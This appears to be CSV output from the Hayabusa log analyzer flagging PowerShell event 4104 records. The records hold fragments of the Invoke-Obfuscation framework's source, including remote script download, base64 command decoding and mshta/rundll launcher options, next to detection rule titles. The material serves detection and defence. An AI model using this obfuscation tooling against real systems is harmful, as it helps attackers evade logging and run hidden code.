$UserInput = $UserInput.Trim('/\') # Cause UserInput of base menu level directories to automatically work. # The only exception is STRING if the current MenuName is _token since it can be the base menu STRING or TOKEN/STRING. If((($MenuLevel | ForEach-Object {$_[1].Trim()}) -Contains $UserInput.Split('/\')[0]) -AND !(('string' -Contains $UserInput.Split('/\')[0]) -AND ($MenuName -eq '_token')) -AND ($MenuName -ne '')) { $UserInput = 'home/' + $UserInput.Trim() } # If current command contains \ or / and does not start with SET or OUT then we are dealing with a compound command. # Setting $Script:CompounCommand in below IF block. If(($Script:CompoundCommand.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND !$UserInput.ToLower().StartsWith('out ') -AND ($UserInput.Contains('\') -OR $UserInput.Contains('/'))) { $Script:CompoundCommand = $UserInput.Split('/\') } # If current command contains \ or / and does not start with SET then we are dealing with a compound command. # Parsing out next command from $Script:CompounCommand in below IF block. If($Script:CompoundCommand.Count -gt 0) { $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -gt 0)) { # If last compound command then it will be a string. If($Script:CompoundCommand.GetType().Name -eq 'String') { $NextCompoundCommand = $Script:CompoundCommand.Trim() $Script:CompoundCommand = @() } Else { # If there are more commands left in compound command then it won't be a string (above IF block). # In this else block we get the next command from CompoundCommand array. $NextCompoundCommand = ([String]$Script:CompoundCommand[0]).Trim() # Set remaining commands back into CompoundCommand. $Temp = $Script:CompoundCommand $Script:CompoundCommand = @() For($i=1; $i -lt $Temp.Count; $i++) { $Script:CompoundCommand += $Temp[$i] } } $UserInput = $NextCompoundCommand } } # Handle new RegEx functionality. 
# Identify if there is any regex in current UserInput by removing all alphanumeric characters (and + or # which are found in launcher names). $TempUserInput = $UserInput.ToLower() @(97..122) | ForEach-Object {$TempUserInput = $TempUserInput.Replace([String]([Char]$_),'')} @(0..9) | ForEach-Object {$TempUserInput = $TempUserInput.Replace($_,'')} $TempUserInput = $TempUserInput.Replace(' ','').Replace('+','').Replace('#','').Replace('\','').Replace('/','').Replace('-','').Replace('?','') If(($TempUserInput.Length -gt 0) -AND !($UserInput.Trim().ToLower().StartsWith('set ')) -AND !($UserInput.Trim().ToLower().StartsWith('out '))) { # Replace any simple wildcard with .* syntax. $UserInput = $UserInput.Replace('.*','_____').Replace('*','.*').Replace('_____','.*') # Prepend UserInput with ^ and append with $ if not already there. If(!$UserInput.Trim().StartsWith('^') -AND !$UserInput.Trim().StartsWith('.*')) { $UserInput = '^' + $UserInput } If(!$UserInput.Trim().EndsWith('$') -AND !$UserInput.Trim().EndsWith('.*')) { $UserInput = $UserInput + '$' } # See if there are any filtered matches in the current menu. Try { $MenuFiltered = ($Menu | Where-Object {($_[1].Trim() -Match $UserInput) -AND ($_[1].Trim().Length -gt 0)} | ForEach-Object {$_[1].Trim()}) } Catch { # Output error message if Regular Expression causes error in ab",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"r() + $Crumb.SubString(1).ToLower() # If no substitution was found for the 3rd or later BreadCrumb element (only for Launcher BreadCrumb) then throw a warning so we can add this substitution pair to $BreadCrumbOCD. 
If(($BreadCrumb.Split('_').Count -eq 2) -AND ($BreadCrumb.StartsWith('Launcher_')) -AND ($Crumb -ne 'Launcher')) { Write-Warning ""No substituion pair was found for `$Crumb=$Crumb in `$BreadCrumb=$BreadCrumb. Add this `$Crumb substitution pair to `$BreadCrumbOCD array in Invoke-Obfuscation."" } } } $BreadCrumb = $BreadCrumbArray -Join '\' } $BreadCrumb = '\' + $BreadCrumb } # Output menu heading. $FirstLine = ""Choose one of the below "" If($BreadCrumb -ne '') { $FirstLine = $FirstLine + $BreadCrumb.Trim('\') + ' ' } Write-Host ""$FirstLine"" -NoNewLine # Change color and verbiage if selection will execute command. If($SelectionContainsCommand) { Write-Host ""options"" -NoNewLine -ForegroundColor Green Write-Host "" to"" -NoNewLine Write-Host "" APPLY"" -NoNewLine -ForegroundColor Green Write-Host "" to current payload"" -NoNewLine } Else { Write-Host ""options"" -NoNewLine -ForegroundColor Yellow } Write-Host "":`n"" ForEach($Line in $Menu) { $LineSpace = $Line[0] $LineOption = $Line[1] $LineValue = $Line[2] Write-Host $LineSpace -NoNewLine # If not empty then include breadcrumb in $LineOption output (is not colored and won't affect user input syntax). If(($BreadCrumb -ne '') -AND ($LineSpace.StartsWith('['))) { Write-Host ($BreadCrumb.ToUpper().Trim('\') + '\') -NoNewLine } # Change color if selection will execute command. If($SelectionContainsCommand) { Write-Host $LineOption -NoNewLine -ForegroundColor Green } Else { Write-Host $LineOption -NoNewLine -ForegroundColor Yellow } # Add additional coloring to string encapsulated by <> if it exists in $LineValue. 
If($LineValue.Contains('<') -AND $LineValue.Contains('>')) { $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""`t$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan # Handle if more than one term needs to be output in different color. If($LastPart.Contains('<') -AND $LastPart.Contains('>')) { $LineValue = $LastPart $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan } Write-Host $LastPart } Else { Write-Host ""`t$LineValue"" } } # Prompt for user input with custom breadcrumb prompt. Write-Host '' If($UserInput -ne '') {Write-Host ''} $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -eq 0)) { # Output custom prompt. Write-Host ""Invoke-Obfuscation$BreadCrumb> "" -NoNewLine -ForegroundColor Magenta # Get interactive user input if CliCommands input variable was not specified by user. If(($Script:CliCommands.Count -gt 0) -OR ($Script:CliCommands -ne $NULL)) { If($Script:CliCommands.GetType().Name -eq 'String') { $NextCliCommand = $Script:CliCommands.Trim() $Script:CliCommands = @() } Else { $NextCliCommand = ([String]$Script:CliCommands[0]).Trim() $Script:CliCommands = For($i=1; $i -lt $Script:CliCommands.Count; $i++) {$Script:CliCommands[$i]} } $UserInput = $NextCliCommand } Else { # If Command was defined on command line and NoExit switch was not defined then output final ObfuscatedCommand to stdout and then quit. Otherwise continue with interactive Invoke-Obfuscation. 
If($CliWasSpecified -AND ($Script:CliCommands.Count -lt 1) -AND ($Script:CompoundCommand.Count -lt 1) -AND ($Script:QuietWasSpecified -OR !$NoExitWasSpecified)) { If($Script:QuietWasSpecified) { # Remove Write-Host and Start-Sleep proxy functions so that Write-Host and Start-Sleep cmdlets will be called during the remainder of the interactive Invoke-Obfuscation session. Remove-Item -Path Function:Write-Host Remove-Item -Path Function:Start-Sleep $Script:QuietWasSpecified = $FALSE # Automatically run 'Show Options' so the user has context of what has successfully been executed. $UserInput = 'show options' $BreadCrumb = 'Show Options' } # -NoExit wasn't specified and -Command was, so we will output the result back in the main While loop. If(!$NoExitWasSpecified) { $UserInput = 'quit' } } Else { $UserInput = (Read-Host).Trim() } # Process interactive UserInput using CLI syntax, so comma-delimited and slash-delimited commands can be processed interactively. If(($Script:CliCommands.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND $UserInput.Contains(',')) { $Script:CliCommands = $UserInput.Split(',') # Reset $UserInput so current While loop will be traversed once more and process UserInput command as a CliCommand. $UserInput = '' } } } # Trim any leading trailing slashes so it doesn't misinterpret it as a compound command unnecessarily. $UserInput = $UserInput.Trim('/\') # Cause UserInput of base menu level directories to automatically work. # The only exception is STRING if the current MenuName is _token since it can be the base menu STRING or TOKEN/STRING. If((($MenuLevel | ForEach-Object {$_[1].Trim()}) -Contains $UserInput.Split('/\')[0]) -AND !(('string' -Contains $UserInput.Split('/\')[0]) -AND ($MenuName -eq '_token')) -AND ($MenuName -ne '')) { $UserInput = 'home/' + $UserInput.Trim() } # If current command contains \ or / and does not start with SET or OUT then we are dealing with a compound command. 
# Setting $Script:CompounCommand in below IF block. If(($Script:CompoundCommand.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND !$UserInput.ToLower().StartsWith('out ') -AND ($UserInput.Contains('\') -OR $UserInput.Contains('/'))) { $Script:CompoundCommand = $UserInput.Split('/\') } # If current command contains \ or / and does not start with SET then we are dealing with a compound command. # Parsing out next command from $Script:CompounCommand in below IF block. If($Script:CompoundCommand.Count -gt 0) { $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -gt 0)) { # If last compound command then it will be a string. If($Script:CompoundCommand.GetType().Name -eq 'String') { $NextCompoundCommand = $Script:CompoundCommand.Trim() $Script:CompoundCommand = @() } Else { # If there are more commands left in compound command then it won't be a string (above IF block). # In this else block we get the next command from CompoundCommand array. $NextCompoundCommand = ([String]$Script:CompoundCommand[0]).Trim() # Set remaining commands back into CompoundCommand. $Temp = $Script:CompoundCommand $Script:CompoundCommand = @() For($i=1; $i -lt $Temp.Count; $i++) { $Script:CompoundCommand += $Temp[$i] } } $UserInput = $NextCompoundCommand } } # Handle new RegEx functionality. # Identify if there is any regex in current UserInput by removing all alphanumeric characters (and + or # which are found in launcher names). 
$TempUserInput = $UserInput.ToLower() @(97..122) | ForEach-Object {$TempUserInput = $TempUserInput.Replace([String]([Char]$_),'')} @(0..9) | ForEach-Object {$TempUserInput = $TempUserInput.Replace($_,'')} $TempUserInput = $TempUserInput.Replace(' ','').Replace('+','').Replace('#','').Replace('\','').Replace('/','').Replace('-','').Replace('?','') If(($TempUserInput.Length -gt 0) -AND !($UserInput.Trim().ToLower().StartsWith('set ')) -AND !($UserInput.Trim().ToLower().StartsWith('out '))) { # Replace any simple wildcard with .* syntax. $UserInput = $UserInput.Replace('.*','_____').Replace('*','.*').Replace('_____','.*') # Prepend UserInput with ^ and append with $ if not already there. If(!$UserInput.Trim().StartsWith('^') -AND !$UserInput.Trim().StartsWith('.*')) { $UserInput = '^' + $UserInput } If(!$UserInput.Trim().EndsWith('$') -AND !$UserInput.Trim().EndsWith('.*')) { $UserInput = $UserInput + '$' } # See if there are any filtered matches in the current menu. Try { $MenuFiltered = ($Menu | Where-Object {($_[1].Trim() -Match $UserInput) -AND ($_[1].Trim().Length -gt 0)} | ForEach-Object {$_[1].Trim()}) } Catch { # Output error message if Regular Expression causes error in ab",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,low,Evas,Use Remove-Item to Delete File,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ove filtering step. # E.g. 
Using *+ instead of *[+] Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' The current Regular Expression caused the following error:' write-host "" $_"" -ForegroundColor Red } # If there are filtered matches in the current menu then randomly choose one for the UserInput value. If($MenuFiltered -ne $NULL) { # Randomly select UserInput from filtered options. $UserInput = (Get-Random -Input $MenuFiltered).Trim() # Output randomly chosen option (and filtered options selected from) if more than one option were returned from regex. If($MenuFiltered.Count -gt 1) { # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host ""`n`nRandomly selected "" -NoNewline Write-Host $UserInput -NoNewline -ForegroundColor $ColorToOutput write-host "" from the following filtered options: "" -NoNewline For($i=0; $i -lt $MenuFiltered.Count-1; $i++) { Write-Host $MenuFiltered[$i].Trim() -NoNewLine -ForegroundColor $ColorToOutput Write-Host ', ' -NoNewLine } Write-Host $MenuFiltered[$MenuFiltered.Count-1].Trim() -NoNewLine -ForegroundColor $ColorToOutput } } } # If $UserInput is all numbers and is in a menu in $MenusWithMultiSelectNumbers $OverrideAcceptableInput = $FALSE $MenusWithMultiSelectNumbers = @('\Launcher') If(($UserInput.Trim(' 0123456789').Length -eq 0) -AND $BreadCrumb.Contains('\') -AND ($MenusWithMultiSelectNumbers -Contains $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')))) { $OverrideAcceptableInput = $TRUE } If($ExitInputOptions -Contains $UserInput.ToLower()) { Return $ExitInputOptions[0] } ElseIf($MenuInputOptions -Contains $UserInput.ToLower()) { # Commands like 'back' that will return user to previous interactive menu. 
If($BreadCrumb.Contains('\')) {$UserInput = $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')).Replace('\','_')} Else {$UserInput = ''} Return $UserInput.ToLower() } ElseIf($HomeMenuInputOptions[0] -Contains $UserInput.ToLower()) { Return $UserInput.ToLower() } ElseIf($UserInput.ToLower().StartsWith('set ')) { # Extract $UserInputOptionName and $UserInputOptionValue from $UserInput SET command. $UserInputOptionName = $NULL $UserInputOptionValue = $NULL $HasError = $FALSE $UserInputMinusSet = $UserInput.SubString(4).Trim() If($UserInputMinusSet.IndexOf(' ') -eq -1) { $HasError = $TRUE $UserInputOptionName = $UserInputMinusSet.Trim() } Else { $UserInputOptionName = $UserInputMinusSet.SubString(0,$UserInputMinusSet.IndexOf(' ')).Trim().ToLower() $UserInputOptionValue = $UserInputMinusSet.SubString($UserInputMinusSet.IndexOf(' ')).Trim() } # Validate that $UserInputOptionName is defined in $SettableInputOptions. If($SettableInputOptions -Contains $UserInputOptionName) { # Perform separate validation for $UserInputOptionValue before setting value. Set to 'emptyvalue' if no value was entered. If($UserInputOptionValue.Length -eq 0) {$UserInputOptionName = 'emptyvalue'} Switch($UserInputOptionName.ToLower()) { 'scriptpath' { If($UserInputOptionValue -AND ((Test-Path $UserInputOptionValue) -OR ($UserInputOptionValue -Match '(http|https)://'))) { # Reset ScriptBlock in case it contained a value. $Script:ScriptBlock = '' # Check if user-input ScriptPath is a URL or a directory. If($UserInputOptionValue -Match '(http|https)://') { # ScriptPath is a URL. # Download content. $Script:ScriptBlock = (New-Object Net.WebClient).DownloadString($UserInputOptionValue) # Set script-wide variables for future reference. 
$Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath (as URL):"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } ElseIf ((Get-Item $UserInputOptionValue) -is [System.IO.DirectoryInfo]) { # ScriptPath does not exist. Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path is a directory instead of a file (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } Else { # Read contents from user-input ScriptPath value. Get-ChildItem $UserInputOptionValue -ErrorAction Stop | Out-Null $Script:ScriptBlock = [IO.File]::ReadAllText((Resolve-Path $UserInputOptionValue)) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath:"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } } Else { # ScriptPath not found (failed Test-Path). Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path not found (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } } 'scriptblock' { # Remove evenly paired {} '' or """" if user includes it around their scriptblock input. 
ForEach($Char in @(@('{','}'),@('""','""'),@(""'"",""'""))) { While($UserInputOptionValue.StartsWith($Char[0]) -AND $UserInputOptionValue.EndsWith($Char[1])) { $UserInputOptionValue = $UserInputOptionValue.SubString(1,$UserInputOptionValue.Length-2).Trim() } } # Check if input is PowerShell encoded command syntax so we can decode for scriptblock. If($UserInputOptionValue -Match 'powershell(.exe | )\s*-(e |ec |en |enc |enco |encod |encode)\s*[""'']*[a-z=]') { # Extract encoded command. $EncodedCommand = $UserInputOptionValue.SubString($UserInputOptionValue.ToLower().IndexOf(' -e')+3) $EncodedCommand = $EncodedCommand.SubString($EncodedCommand.IndexOf(' ')).Trim("" '`"""") # Decode Unicode-encoded $EncodedCommand $UserInputOptionValue = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedCommand)) } # Set script-wide variables for future reference. $Script:ScriptPath = 'N/A' $Script:ScriptBlock = $UserInputOptionValue $Script:ObfuscatedCommand = $UserInputOptionValue $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $UserInputOptionValue $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptBlock:"" -ForegroundColor Cyan Write-Host $Script:ScriptBlock -ForegroundColor Magenta } 'emptyvalue' { # No OPTIONVALUE was entered after OPTIONNAME. $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' No value was entered after' -NoNewLine Write-Host ' SCRIPTBLOCK/SCRIPTPATH' -NoNewLine -ForegroundColor Cyan Write-Host '.' 
-NoNewLine } default {Write-Error ""An invalid OPTIONNAME ($UserInputOptionName) was passed to switch block.""; Exit} } } Else { $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' OPTIONNAME' -NoNewLine Write-Host "" $UserInputOptionName"" -NoN",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"ove filtering step. # E.g. Using *+ instead of *[+] Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' The current Regular Expression caused the following error:' write-host "" $_"" -ForegroundColor Red } # If there are filtered matches in the current menu then randomly choose one for the UserInput value. If($MenuFiltered -ne $NULL) { # Randomly select UserInput from filtered options. $UserInput = (Get-Random -Input $MenuFiltered).Trim() # Output randomly chosen option (and filtered options selected from) if more than one option were returned from regex. If($MenuFiltered.Count -gt 1) { # Change color and verbiage if acceptable options will execute an obfuscation function. 
If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host ""`n`nRandomly selected "" -NoNewline Write-Host $UserInput -NoNewline -ForegroundColor $ColorToOutput write-host "" from the following filtered options: "" -NoNewline For($i=0; $i -lt $MenuFiltered.Count-1; $i++) { Write-Host $MenuFiltered[$i].Trim() -NoNewLine -ForegroundColor $ColorToOutput Write-Host ', ' -NoNewLine } Write-Host $MenuFiltered[$MenuFiltered.Count-1].Trim() -NoNewLine -ForegroundColor $ColorToOutput } } } # If $UserInput is all numbers and is in a menu in $MenusWithMultiSelectNumbers $OverrideAcceptableInput = $FALSE $MenusWithMultiSelectNumbers = @('\Launcher') If(($UserInput.Trim(' 0123456789').Length -eq 0) -AND $BreadCrumb.Contains('\') -AND ($MenusWithMultiSelectNumbers -Contains $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')))) { $OverrideAcceptableInput = $TRUE } If($ExitInputOptions -Contains $UserInput.ToLower()) { Return $ExitInputOptions[0] } ElseIf($MenuInputOptions -Contains $UserInput.ToLower()) { # Commands like 'back' that will return user to previous interactive menu. If($BreadCrumb.Contains('\')) {$UserInput = $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')).Replace('\','_')} Else {$UserInput = ''} Return $UserInput.ToLower() } ElseIf($HomeMenuInputOptions[0] -Contains $UserInput.ToLower()) { Return $UserInput.ToLower() } ElseIf($UserInput.ToLower().StartsWith('set ')) { # Extract $UserInputOptionName and $UserInputOptionValue from $UserInput SET command. 
$UserInputOptionName = $NULL $UserInputOptionValue = $NULL $HasError = $FALSE $UserInputMinusSet = $UserInput.SubString(4).Trim() If($UserInputMinusSet.IndexOf(' ') -eq -1) { $HasError = $TRUE $UserInputOptionName = $UserInputMinusSet.Trim() } Else { $UserInputOptionName = $UserInputMinusSet.SubString(0,$UserInputMinusSet.IndexOf(' ')).Trim().ToLower() $UserInputOptionValue = $UserInputMinusSet.SubString($UserInputMinusSet.IndexOf(' ')).Trim() } # Validate that $UserInputOptionName is defined in $SettableInputOptions. If($SettableInputOptions -Contains $UserInputOptionName) { # Perform separate validation for $UserInputOptionValue before setting value. Set to 'emptyvalue' if no value was entered. If($UserInputOptionValue.Length -eq 0) {$UserInputOptionName = 'emptyvalue'} Switch($UserInputOptionName.ToLower()) { 'scriptpath' { If($UserInputOptionValue -AND ((Test-Path $UserInputOptionValue) -OR ($UserInputOptionValue -Match '(http|https)://'))) { # Reset ScriptBlock in case it contained a value. $Script:ScriptBlock = '' # Check if user-input ScriptPath is a URL or a directory. If($UserInputOptionValue -Match '(http|https)://') { # ScriptPath is a URL. # Download content. $Script:ScriptBlock = (New-Object Net.WebClient).DownloadString($UserInputOptionValue) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath (as URL):"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } ElseIf ((Get-Item $UserInputOptionValue) -is [System.IO.DirectoryInfo]) { # ScriptPath does not exist. 
Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path is a directory instead of a file (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } Else { # Read contents from user-input ScriptPath value. Get-ChildItem $UserInputOptionValue -ErrorAction Stop | Out-Null $Script:ScriptBlock = [IO.File]::ReadAllText((Resolve-Path $UserInputOptionValue)) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath:"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } } Else { # ScriptPath not found (failed Test-Path). Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path not found (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } } 'scriptblock' { # Remove evenly paired {} '' or """" if user includes it around their scriptblock input. ForEach($Char in @(@('{','}'),@('""','""'),@(""'"",""'""))) { While($UserInputOptionValue.StartsWith($Char[0]) -AND $UserInputOptionValue.EndsWith($Char[1])) { $UserInputOptionValue = $UserInputOptionValue.SubString(1,$UserInputOptionValue.Length-2).Trim() } } # Check if input is PowerShell encoded command syntax so we can decode for scriptblock. If($UserInputOptionValue -Match 'powershell(.exe | )\s*-(e |ec |en |enc |enco |encod |encode)\s*[""'']*[a-z=]') { # Extract encoded command. 
$EncodedCommand = $UserInputOptionValue.SubString($UserInputOptionValue.ToLower().IndexOf(' -e')+3) $EncodedCommand = $EncodedCommand.SubString($EncodedCommand.IndexOf(' ')).Trim("" '`"""") # Decode Unicode-encoded $EncodedCommand $UserInputOptionValue = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedCommand)) } # Set script-wide variables for future reference. $Script:ScriptPath = 'N/A' $Script:ScriptBlock = $UserInputOptionValue $Script:ObfuscatedCommand = $UserInputOptionValue $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $UserInputOptionValue $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptBlock:"" -ForegroundColor Cyan Write-Host $Script:ScriptBlock -ForegroundColor Magenta } 'emptyvalue' { # No OPTIONVALUE was entered after OPTIONNAME. $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' No value was entered after' -NoNewLine Write-Host ' SCRIPTBLOCK/SCRIPTPATH' -NoNewLine -ForegroundColor Cyan Write-Host '.' 
-NoNewLine } default {Write-Error ""An invalid OPTIONNAME ($UserInputOptionName) was passed to switch block.""; Exit} } } Else { $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' OPTIONNAME' -NoNewLine Write-Host "" $UserInputOptionName"" -NoN",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ewLine -ForegroundColor Cyan Write-Host "" is not a settable option."" -NoNewLine } If($HasError) { Write-Host ""`n Correct syntax is"" -NoNewLine Write-Host ' SET OPTIONNAME VALUE' -NoNewLine -ForegroundColor Green Write-Host '.' -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' SHOW OPTIONS' -NoNewLine -ForegroundColor Yellow Write-Host ' for more details.' } } ElseIf(($AcceptableInput -Contains $UserInput) -OR ($OverrideAcceptableInput)) { # User input matches $AcceptableInput extracted from the current $Menu, so decide if: # 1) an obfuscation function needs to be called and remain in current interactive prompt, or # 2) return value to enter into a new interactive prompt. # Format breadcrumb trail to successfully retrieve the next interactive prompt. $UserInput = $BreadCrumb.Trim('\').Replace('\','_') + '_' + $UserInput If($BreadCrumb.StartsWith('\')) {$UserInput = '_' + $UserInput} # If the current selection contains a command to execute then continue. Otherwise return to go to another menu. If($SelectionContainsCommand) { # Make sure user has entered command or path to script. 
If($Script:ObfuscatedCommand -ne $NULL) { # Iterate through lines in $Menu to extract command for the current selection in $UserInput. ForEach($Line in $Menu) { If($Line[1].Trim(' ') -eq $UserInput.SubString($UserInput.LastIndexOf('_')+1)) {$CommandToExec = $Line[3]; Continue} } If(!$OverrideAcceptableInput) { # Extract arguments from $CommandToExec. $Function = $CommandToExec[0] $Token = $CommandToExec[1] $ObfLevel = $CommandToExec[2] } Else { # Overload above arguments if $OverrideAcceptableInput is $TRUE, and extract $Function from $BreadCrumb Switch($BreadCrumb.ToLower()) { '\launcher\ps' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 1} '\launcher\cmd' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 2} '\launcher\wmic' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 3} '\launcher\rundll' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 4} '\launcher\var+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 5} '\launcher\stdin+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 6} '\launcher\clip+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 7} '\launcher\var++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 8} '\launcher\stdin++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 9} '\launcher\clip++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 10} '\launcher\rundll++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 11} '\launcher\mshta++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 12} default {Write-Error ""An invalid value ($($BreadCrumb.ToLower())) was passed to switch block for setting `$Function when `$OverrideAcceptableInput -eq `$TRUE.""; Exit} } # Extract $ObfLevel from first element in array (in case 0th element is used for informational purposes), and extract $Token from $BreadCrumb. $ObfLevel = $Menu[1][3][2] $Token = $UserInput.SubString($UserInput.LastIndexOf('_')+1) } # Convert ObfuscatedCommand (string) to ScriptBlock for next obfuscation function. 
